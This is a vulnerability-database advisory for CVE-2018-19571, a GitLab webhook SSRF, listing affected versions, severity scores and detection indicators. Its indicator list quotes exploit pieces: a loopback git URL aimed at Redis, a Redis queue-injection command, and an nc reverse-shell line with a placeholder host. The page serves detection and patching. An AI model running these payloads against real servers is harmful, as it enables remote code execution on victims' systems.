cbcvebase.
CVE-2018-19571
published 2019-07-10

CVE-2018-19571: GitLab CE/EE, versions 8.18 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an SSRF vulnerability in webhooks.

PriorityP264high7.7CVSS 3.1
AVNACLPRLUINSCCHINAN
EXPLOIT
EPSS
27.98%
97.9th percentile
GitLab CE/EE, versions 8.18 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an SSRF vulnerability in webhooks.

Affected

6 ranges
VendorProductVersion rangeFixed in
debiangitlab< gitlab 11.3.11+dfsg-1 (sid)gitlab 11.3.11+dfsg-1 (sid)
gitlabgitlab
gitlabgitlab>= 11.4.0 < 11.4.811.4.8
gitlabgitlab>= 11.5.0 < 11.5.111.5.1
gitlabgitlab>= 8.18.0 < 11.3.1111.3.11
gitlabgitlab_ce

Detection & IOCsextracted from sources · hover to see the quote

urlgit://[0:0:0:0:0:ffff:127.0.0.1]:6379/
urlgit%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2F.git
port6379
commandmulti sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push
commandopen('|nc <ip> <port> -e /bin/sh').read
otherresque:gitlab:queue:system_hook_push
path/projects/new
path/users/sign_in
  • Detect SSRF via git import_url using IPv6-mapped IPv4 loopback address targeting Redis on port 6379 — the core exploitation primitive for CVE-2018-19571.
  • Monitor for the anomalous User-Agent 'Moana Browser 1.0' in HTTP requests to GitLab, associated with exploit script 49257.
  • Flag POST to /projects with Content-Type application/x-www-form-urlencoded containing the string 'resque:gitlab:queue:system_hook_push' in the body.
  • Detect outbound connections from the GitLab server to 127.0.0.1:6379 (Redis) originating from the git import/clone functionality, indicating SSRF exploitation.
  • ·Exploitation requires an authenticated GitLab session; the SSRF in webhooks/import_url is chained with CVE-2018-19585 (CRLF injection) to achieve RCE. Blocking unauthenticated access alone is insufficient.
  • ·The exploit targets GitLab running on non-standard port 5080 in the tested environment; detection rules should not be limited to port 80/443.
  • ·Affected versions span a wide range (8.18 through 11.5.0); patched versions are 11.3.11, 11.4.8, and 11.5.1. Ensure version checks cover all branches.

CVSS provenance

nvdv3.17.7HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
nvdv2.04.0MEDIUMAV:N/AC:L/Au:S/C:P/I:N/A:N
vendor_debian7.7HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.